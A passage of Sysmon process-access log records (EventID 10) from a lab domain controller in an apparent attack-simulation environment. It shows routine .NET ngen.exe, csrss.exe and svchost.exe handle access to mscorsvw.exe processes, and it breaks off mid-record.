ramework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.683","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-001060A20E00}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7057,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.683\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-001060A20E00}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.683","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-001060A20E00}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7058,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.683\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-001060A20E00}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.683","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-001060A20E00}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7059,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.746\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-00108AA60E00}\r\nTargetProcessId: 1988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.746","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-00108AA60E00}","TargetProcessId":"1988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7060,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.746\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-00108AA60E00}\r\nTargetProcessId: 1988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.746","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-00108AA60E00}","TargetProcessId":"1988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7061,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.746\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-00108AA60E00}\r\nTargetProcessId: 1988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.746","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-00108AA60E00}","TargetProcessId":"1988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7062,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.777\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-00105AAA0E00}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.777","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-00105AAA0E00}","TargetProcessId":"4012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7063,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.777\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-00105AAA0E00}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.777","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-00105AAA0E00}","TargetProcessId":"4012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7064,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.793\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-00105AAA0E00}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 